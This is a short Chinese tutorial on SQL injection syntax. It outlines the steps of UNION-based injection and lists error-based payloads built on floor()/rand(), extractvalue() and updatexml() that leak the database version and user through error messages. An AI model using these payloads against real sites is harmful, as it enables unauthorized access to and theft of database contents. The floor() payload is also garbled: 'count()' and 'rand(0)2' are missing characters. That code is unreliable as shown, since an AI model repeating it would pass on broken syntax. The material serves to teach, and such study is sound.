SQL注入语法类型

SQL注入语法类型

一、Unionunion操作符 用于合并两个或多个select 语句的结果集

注意：union内部的select语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时，每条select语句中的列的顺序必须相同。默认情况，Union操作符选取不同的值。如果允许重复的值，请使用union all

union注入方法1、 order by 确定列数2、观察页面返回，选取可以显示数据的位置，进行下一步的注入3、读库信息4、读表信息5、读字段6、读数据

二、利用报错注入报错注入原理：构造payload让信息通过错误提示回显出来

报错函数floor()select count() from information_schema.tables group by concat((select version()), floor(rand(0)2));group by 对rand()函数进行操作时产生错误

extractvalue()extractvalue(1,concat(0x7e,(select user()),0x7e));xpath语法错误产生报错

updatexml()select updatexml(1,concat(0x7e,(select user()),0x7e),1);xpath 语法错误产生报错

版权声明：本文内容由网络用户投稿，版权归原作者所有，本站不拥有其著作权，亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容，请联系我们jiasou666@gmail.com 处理，核实后本网站将在24小时内删除侵权内容。